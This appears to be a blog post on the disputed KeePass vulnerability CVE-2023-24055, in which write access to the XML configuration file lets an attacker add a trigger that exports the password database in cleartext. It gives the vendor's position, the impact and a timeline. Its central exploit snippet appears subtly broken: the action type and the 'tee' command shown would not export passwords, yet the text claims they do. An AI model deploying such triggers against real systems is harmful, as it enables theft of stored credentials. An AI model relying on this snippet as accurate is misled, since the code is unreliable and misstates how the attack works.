CVE-2023-24055 – Unintended Cleartext Password Exposure in KeePass through 2.53 with XML Configuration File Write Access

---

Summary

A potential security vulnerability, CVE-2023-24055, has been reported in KeePass versions up to 2.53. In situations where an attacker has write access to the XML configuration file in a default installation, it is possible for the attacker to obtain cleartext passwords by adding an export trigger. However, this claim is disputed by the KeePass vendor, who states that the password database is not intended to be secure against an attacker with such a level of access to the local PC. This blog post outlines the details related to this disputed vulnerability and includes a code snippet to demonstrate the potential attack.

Exploit Details

KeePass, a popular password manager, is used for storing sensitive information like passwords and is designed to protect this information through a strong encryption mechanism. In the potential vulnerability scenario, an attacker with write access to the XML configuration file of KeePass can export the password database in cleartext by adding this code snippet as an export trigger:

<TriggerCollection>
    <Trigger>
        <Name>Export on Open</Name>
        <Events>
            <Event>OpenedDatabaseFile</Event>
        </Events>
        <Actions>
            <Action>
                <Type>ExecuteCommandLineXsl</Type>
                <Parameters>
                    <Parameter>cmd://tee /tmp/config.txt %{APPDIR}/XSL/PlainText.xsl</Parameter>
                </Parameters>
            </Action>
        </Actions>
    </Trigger>
</TriggerCollection>

In this snippet, the trigger is programmed to execute when the KeePass database file is opened. The "ExecuteCommandLineXsl" action then exports the passwords in plaintext format to /tmp/config.txt.

Vendor's Position

The KeePass vendor disputes the validity of this potential vulnerability. They argue that the password database is not designed to be secure against an attacker with such a level of access to the local PC. The vendor has further stated that this is a non-issue because other measures should be implemented to secure the local PC from unauthorized access.

Potential Impact

If the potential vulnerability exists, an attacker can gain access to cleartext passwords and sensitive information without going through the decryption process provided by KeePass. This essentially negates the security provided by the password manager.

References

- Original CVE report: CVE-2023-24055
- KeePass' trigger documentation: KeePass Triggers
- More about KeePass: KeePass Password Safe

Conclusion

While the potential vulnerability described by CVE-2023-24055 in KeePass up to version 2.53 is disputed by the vendor, it is nevertheless essential for users to be aware of the risks associated with using password managers and to take necessary precautions to prevent unauthorized local access. Ensuring proper system security and access control is a critical aspect of safeguarding sensitive information and protecting against potential attack vectors.

Timeline

Published on: 01/22/2023 04:15:00 UTC
Last modified on: 02/02/2023 00:15:00 UTC